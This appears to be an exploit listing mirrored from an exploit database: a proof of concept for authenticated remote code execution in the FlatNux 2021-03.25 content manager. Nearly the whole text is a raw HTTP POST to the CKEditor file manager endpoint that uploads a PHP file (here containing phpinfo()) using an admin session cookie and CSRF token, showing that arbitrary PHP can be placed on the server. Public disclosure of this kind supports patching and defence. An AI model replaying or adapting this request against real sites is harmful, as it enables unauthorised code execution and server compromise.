Share
## https://sploitus.com/exploit?id=PACKETSTORM:171745
# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)  
# Exploit Author: Ömer Hasan Durmuş  
# Vendor Homepage: https://en.altervista.org  
# Software Link: http://flatnux.altervista.org/flatnux.html  
# Version: 2021-03.25  
# Tested on: Windows/Linux  
  
POST  
/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=en  
HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------393526031113460918603940283286  
Content-Length: 413  
Origin: http://localhost  
Connection: close  
Referer:  
http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnew  
Cookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;  
ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: iframe  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------393526031113460918603940283286  
Content-Disposition: form-data; name="upload"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php phpinfo(); ?>  
-----------------------------393526031113460918603940283286  
Content-Disposition: form-data; name="ckCsrfToken"  
  
BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb  
-----------------------------393526031113460918603940283286--